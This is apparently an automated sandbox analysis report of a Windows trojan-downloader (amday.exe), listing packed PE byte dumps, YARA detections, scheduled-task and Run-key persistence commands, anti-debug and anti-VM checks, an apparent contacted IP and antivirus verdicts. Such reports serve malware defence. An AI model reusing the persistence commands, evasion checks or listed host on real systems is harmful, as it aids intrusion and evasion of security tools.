InternetReadFile Nov. 6, 2023, 9:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL(Aeà\²#Á @@ÅÔmM@¸À0Ã èLÃÄwD ± ` r @@ Ì°@À Ð@@ ì&à@@.imports@À.%â¹Â¿/ @@.themida>0`à.bootX%°B``.%â¹Â¿/Ðh `.vmp0]] h `.vmp1Ìw@À.vmp2sKwtK `.relocÄÃzK@@.rsrc 0ÃTK@@fxô%¸ ¼¶Pz¸øb·ºj¦Â(&½æ+»®À%zIä;´êûKÌºlâ7Ù:ßïð7§?Xé®[ã;£\!²:];´ý±_Îõä¿\|PÜ'4 äÁ`Kíª~(i jæ¨R w,qç \|èç À-þIô_ÙÁ¯Áoä-H¢Ûÿÿÿë]$í'Pß ÞªnO·/ÎÁÞA6NÉ©>4qtwç Æ×ç :Üa¿~âwÛç ä÷ªáæ T67$y"4fu(cZ«°í®íYÃÐÎWÇR°Õç xùhV]}wy)ç ü¤ç azÒËRaðô_xåÓcSäô_ÛÈÞÿ\DRAGÍ~ÚCÁKãÈño ç aB\{ k`}UäüYÄAô_<êÒùîD½²¿J þëëtÊm;gÏöÜ®(Bô_?,q:æåÜâ 9Z¡¢ÿ¤Þ¶,?b)°±²¤XÀµ¶¾]o±ôß9Z¤Ùó¢µ}<Y!Ä~ÿÿWÑü.Ú<z'Å/:²zW.c)yÐh8è¥æ8:©;E\|êÅÊíÒe2Ü¥CÍ ,%ÂÍÃª²(ý~&rÓhoéD,íåíZ@íS¤«ET4¼²5åêK]OEª´&Ô«+ôÄ+i?ÙVcÀ9/a8!_¥Ú9ÜÊEø8¨ÇIÿè?Ç ×PWò,9aS¯~&ÚvãLàáéÆ ¯ E§°§Ö©>®Û¬¨×R©Zkn¬¨/h©±~È÷@ U÷vwþÂÐÂ®2ÅfÿÀÁè0þÂÁøÄÐÂ2ÚÔ+ÀfÁø©ÂèTVBÁèh±L, 3ÃAh>â5ÊÍJ÷T$d$íA[h¾þ N÷Ðd$éEA½0%·ÅU´nµïòf1¬ìÖ¾ËÀ¶n µïò2ÃMfÁåM4é>+·Ê>¸FòJ¤kHÁæpèÇGèM@ à§ØÇË%8#ôÓÜ4ÃÔ:Cô½üúd;«£Üañ9äO8iÏÈ9We9×~RQà~X^ÂjyàÙPJñØ½Fô:+¥ÀõÊû_ÊKÚYò¡æäMËf8\ºl©5üs®(Å{ÉY&¶ÓÙÝþÿÿÿë¢3½£Ýü{¹þûcÆÄ¶#ÜN$ÑË1éo ?a~P 4Ûí4åR§ ^nleîÈ1ûâ4ñ-¿(É_78y43¥§ ^Ãj¯ïEù2gd®¸³ñH0Ú1ÊÃæ=o©õHûbÿ~ÎQÍïL¤_¬46h§ ^#+]xã@Ùó0Á/<àvO¶G®'\°Ôïöu©sæs¸7¼Ös4î¯4_§ ^´ ãÃúfø1ç¾7³[i\|\|Ë]ú¢¬°8Wñ°¢¡1 ^\|úQQH¤Ì¡2¢ü¬1 ^GºpF½ÊSª½ÑJSÝ ,ê¶K°¼ªÞåzXÄ 2 2@ÕÆG½Ûãäcá°"¨PÅHÁ½n9½Ú(M«}zòãsÃ^»Ëùûo";¤ãt~ìUätÚÃ{ÄDcEè>¸¦× C?Ü>hgøH_X¶ÏÙ_áà7UÆ?Ù©~&è®ï_? SËë^[[lTÅåâÕÿ®'¶ãÑ¯àáL¦®ïXB@1÷Ø u ¯4KíòU2<U#õ{ReRüåã}3á>ßj?lÚ,ôûÄR´Ëå©~&(S¨N>ý¨í; ÚRCLÃä6¡³¯?Õ® ,tåJUÒðå êuës³3Té¯×¾1oðM>§I? wVÀ]õ>Ðs?#ýU#>5"%ê"ÅÊµR-"ÊýÊ4U2¬~¸¨~ &ÞÂ³WN ÕæV=:;¸ÓêÑEûÀ4¯~hWè£ fôò¯N ¢6N ½¢YÓgÐù±_]]^¬×Ûiøy±Nâyÿÿÿëö¨@0~w±ZBBe¾+æÀF ¶8wØOÖ·Ï¥®`øý¯^®±k®ÜM¯ËÄØ>&Í ÁÑté¨âtN ®´y\+LaÜ6@¦«^ ÄÄjÚÔsUýª¨»)y'N ËN ã@ÑÔ/¶^o±_Æ07PÄ§ÿ¤ôo±_&5Îïø o±ß¯qÓ´F8ÁCa¨PTÝZÐ}íJX]MÈ<§qÞ[=;DãÂË¼ë´$2´[£«$p¦<5=3dý Ì1k«~&äURÙAXWØ8ÏÅª¬¼d}â\|lÌY<ÚË«ôE*h¬á#²ãù¶oW_ª)<yf°qÉÞÙÇ¶`ÆYé ¦>©îÑè=C<u::MÊdª~&©æú»T NnÏ^&ªæ¬¯ih`q¡FtÖW¦®§èGÇý´;è«cH^Ë31ï2ÉOO3Í L²Í;è{2+Å¼»¤[»}Ã=\ ì²£Øâ7aÿÿÿè6](öô±_UÎö@û¹í½ô±_¡yiMÆ¥p[þÿÿ¿ÙÕ\|Æ+} ô±_òÀ7[þÿÿßÙ$ ô²öv,[þÿÿÙl£OÁPô±_ó¦ëN+[þÿÿ¿Ùw1öÎ[þÿÿ?Ù&Öm/~ïÚkY[þÿÿÙ²²ô±_À{![þÿÿÿØ¬TÊÎæè¢Ç[þÿÿÙòé.Ã[þÿÿ¿Ø»\ækýô±_Çþ=±"ÈýL~[þÿÿ?ÙË2+Áts;ÊÕREªlí%§]¢¢ª ª¢'H£È÷@êè¢d¦£JzuÊû2^3qNÁT2RdÒ]Ê¢Ä å[¥ZºmJY£~°=¢k¸ÂDôfþfÃñ¸ÈµÇh°& Ø0È?'fà¯7.Aþ~Û^hÙIÖ4èk¹¿u(@f¶A×¿C×¿è+D>óâÿÐPÒÛ ÷`¾r§X Jnr~.ªWñ¥-¦3ÙÑU¨¨%vñ#LêÒ request_handle: 0x00cc000c	1	1	0
InternetReadFile Nov. 6, 2023, 9:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd²ßûð.ª,J @ @-@-T6 H.textÄ¨, ª, `.sdataHà,®,@À.rsrcT6-8¾,@@.reloc@-ö,@B È,HÈª&oÈÐ÷0÷ +& f8tþ&þ! L(:X8S8ªþ? Xþ?þ?þþþA8[ & <(:8þ;#éÁ/ûÿ'@#@( Y( þþ<þ<: C8Ýþ G þþ e8Ã8hþ5 Xþ5þ5þþþ7 8þ%þ%KàXþ%þ%n#%@#@Y( jX 4~Ì È3gaij_àþ%þ%#ð?#ð?(X( Xþ%þ%Gþ&þ%#ð?#ð?( X( Xþ% s(:ï&þþKàX#@#ð?(Y( Xþ [8¶þ#ëÁÝ{!@#@(X( þþ `(9&þ#@#@(Y( X#aÿs )ÛA#ËA(Y( T V(:-8(þþ #@#@(X( XKàXþ d8ð8cþ #´ ¨ÿ!@#@(Y( #½ógæ jQ@#@@( Y( þ (&þ #>Gß_ÈÅ@#@(Y( Xþ H:n&þ#V@#>@Y( XþþþKàX%þþ 28-þ% Tþ%#@#@( X( Xþ% 8òþ # ÷ 5A4@#@(Y( X Tþ #ð?#ð?(X( Ó Õï¶g Ñï¶gaiZX T((9Uüÿÿ& =(:r&þ9(þ #@#ð?[( Xþ 8¬þ Rþ Xþ n9& þ/8¡ fþLþLE¯ö"î¯\Q~ ÄûÿÿSÝï ,¡ gúÿÿdff´¯ À¬ùÿÿÝùÿÿze -á.=ðIûÿÿ îôy&¿<úÿÿp ³ w, 9 ýÿÿæ-Ý ³8×ûÿÿkêØÔãýÿÿáþýÿÿ¿Ö Ë®üÿÿÒüÿÿgïR@c s ¥³Þªb£ÍùÿÿûÿÿÄx w[3"úÿÿ¡TK ?üÿÿ#WÁçùÿÿ:P r /(9ðýÿÿ&þ9ì ^8Üýÿÿþ þ'þ#LH#æ,@#@(Y( XK \|8¤ýÿÿþþàXþ#þ##B@#B@(X( #@@#@@(X( þ (& :Aýÿÿ&þ% Xþ%þ%G þþIþI9 8ýÿÿþ #@#ø?(Y( Xþ -8Ýüÿÿþ #z7×i)@#@( Y( Xþ 8¬üÿÿþþ þ?þ!þ?Xþ8 þ@þ@9.øÿÿþþ þ?Yþ"þ?Xþ 8Uüÿÿþ G þþ J8;üÿÿþ+þ þ2Yþ"þ2Xþ+8Éþ2 Xþ2 8üÿÿ8~þ% Rþ% Xþ%þF XþFþF#@#@Z( þþJ i8¨ûÿÿ8%þ% R K8ûÿÿþ Xþ _8wûÿÿþþ$àXþ%þ%#@#@(Y( #½ógæ jQ@#@@(Y( þ (& P8ûÿÿþþ.àX#¼?<)$@#@( X( #@@#@@(X( þ (&þ#ÝÐËA#ÝÐËAX( T \8úÿÿþ:þ Xþ j8{úÿÿþ; Xþ; y8cúÿÿ þ8 Z8Púÿÿþ#îôë½ï_@#N@(Y( YKþ ,8úÿÿ þ= 48úÿÿþ n#.ð¥{E@#@(X( jX# @#À[( j_àþ þ #@#ð?( X( Xþ þ Gþ a8ùÿÿ8Õþ þ8þ.B¥ (8kùÿÿþ þ KàXþ *(:Mùÿÿ&þ#îKEÂ¹@#@( X( XþX%þþ x8ùÿÿþ Xþ 8iþÿÿþ Rþ Xþ þ request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00505c00', u'virtual_address': u'0x00318000', u'entropy': 7.993503009520998, u'name': u'.zip#**.', u'virtual_size': u'0x00505a30'}

entropy

7.99350300952

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00021000', u'virtual_address': u'0x00820000', u'entropy': 6.882016393250344, u'name': u'.rsrc', u'virtual_size': u'0x0005884f'}

entropy

6.88201639325

description

A section with a high entropy has been found

entropy

0.998391217943

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 6, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url	http://purl.org/rss/1.0/
url	http://www.passport.com

Yara rule detected in process memory (33 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Hijack network configuration	rule	Hijack_Network
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	"C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe"
cmdline	C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f

Communicates with host for which no DNS query was performed (1 event)

host

185.172.128.100

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known windows from debuggers and forensic tools (50 out of 150 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Registry Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: File Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Process Monitor - Sysinternals: www.sysinternals.com window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:43 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Nov. 6, 2023, 9:44 a.m.	class_name: Regmonclass window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusW Nov. 6, 2023, 9:45 a.m.	service_handle: 0x000000004b8ded30 service_type: 48 service_status: 3		0	0

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\clips.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\mnr.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2968 resumed a thread in remote process 2076
NtResumeThread Nov. 6, 2023, 9:43 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2076	1	0	0

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 6, 2023, 9:43 a.m.	information_class: 76 (SystemFirmwareTableInformation)		3221225507	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35 exception.symbol: clips+0x32daf0 exception.instruction: in eax, dx exception.module: clips.exe exception.exception_code: 0xc0000096 exception.offset: 3332848 exception.address: 0x158daf0 registers.esp: 3145072 registers.edi: 4861434 registers.eax: 1447909480 registers.ebp: 19542016 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 19916755 registers.ecx: 10	1	0	0

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress Nov. 6, 2023, 9:45 a.m.	ordinal: 0 function_address: 0x000000000014eab8 function_name: wine_get_unix_file_name module: KERNEL32 module_address: 0x0000000076c10000		-1073741511	0

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Deyma.a!c
Skyhigh	Artemis!Trojan
McAfee	Artemis!3E478DCC2A01
Sangfor	Downloader.Win32.Deyma.Vruk
K7AntiVirus	Trojan ( 0059d08c1 )
K7GW	Trojan ( 0059d08c1 )
CrowdStrike	win/malicious_confidence_90% (W)
BitDefenderTheta	Gen:NN.ZexaF.36792.@J1@ay9cEekO
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/GenCBL.DFH
APEX	Malicious
Kaspersky	Trojan-Downloader.Win32.Deyma.gmg
Rising	Downloader.Deyma!8.1093B (CLOUD)
Sophos	Mal/Generic-S
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.3e478dcc2a01b611
Ikarus	Win32.Outbreak
Webroot	W32.Trojan.Znyonm
Microsoft	Trojan:Win32/Znyonm
ZoneAlarm	Trojan-Downloader.Win32.Deyma.gmg
Cynet	Malicious (score: 100)
DeepInstinct	MALICIOUS
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H0DK423
AVG	Win32:Evo-gen [Trj]
Avast	Win32:Evo-gen [Trj]

amday.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All